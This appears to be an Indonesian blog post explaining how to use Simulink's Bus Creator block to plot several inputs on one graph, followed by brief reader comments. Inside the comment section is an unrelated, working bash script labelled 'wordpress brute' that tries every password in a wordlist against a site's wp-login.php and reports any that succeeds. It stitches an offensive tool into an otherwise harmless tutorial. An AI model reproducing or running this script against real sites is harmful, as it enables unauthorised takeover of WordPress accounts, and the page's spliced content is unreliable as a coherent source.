Tugas Simulink
Sebenarnya hanya butuh “Bus Creator” saja untuk menggabungkan beberapa masukan manjadi satu grafik. “Bus Creator” tersebut gunanya sebagai penghubung, adanya di ‘commonly used blocks’. Tinggal di seret aja tuh dari daftar tabel sebelah kiri dan tarok di sebelah kanan. Terus di kasih penghubung seperti biasa, setelah tersambung nanti akan secara otomatis mambaca semua inputnya.
Supaya lebih jelas gambarnya diklik aja, nanti akan keluar tuh gambar yang jelasnya. Dari gambar dibawah sudah terlihatkan caranya. Grafik yang dibawah adalah hasil dari bagan tersebut. Nah terus tinggal di print screen, masukin ke word terus di print deh. Atau bisa juga langsung di print kok. Okeh, semoga membantu. ![]()
Btw ini tugas belum tentu benar loh, tapi sih kayaknya emang gini caranya. Dan jangan lupa mengganti angka2 atau variable-nya ya.
[ Klik gambar diatas untuk lebih jelasnya ]
Random Posts
Comments
4 Comments on Tugas Simulink
-
suryo on
Wed, 24th Jun 2009 20:13
-
naknus on
Mon, 6th Jul 2009 16:57
-
Nafi' Abdul Hakim on
Thu, 9th Jul 2009 20:40
-
asep on
Tue, 19th Jan 2010 11:11
thank U broo
thanks artikelnya ya..
nambah ilmu
hehehehehe..
aku makin bingung sama artikel diatas..
hehehehe..
bingung apa maksudnya..
maaf
#!/usr/bin/env bash
# wordpress brute, v0.2
echo “wordpress login cracker”
echo
echo “enter website with full path to wordpress:
“; read site
echo -n “enter wordpress user
“; read user
echo -n “enter wordlist path
“; read wlpath
n=`cat “$wlpath” | wc -l`
for (( i=1; i <= $n; i++));
do
#default user is admin
password=`sed -n “$i”p “$wlpath”`
b=`echo “log=$user&pwd=$password&wp-submit=Log+In&redirect_to=wp-admin” | lynx -dump -nolist -post_data “”$site”/wp-login.php” | grep ERROR`
echo trying user $user with password $password
if [ -z "$b" ]
then
echo “SUCCESS: “$site” password is: “$password”"
echo “have fun…”
exit 0
fi
done
echo
echo “brute force complete”
echo “no password found :(”
Tell me what you're thinking...
and oh, if you want a pic to show with your comment, go get a gravatar!



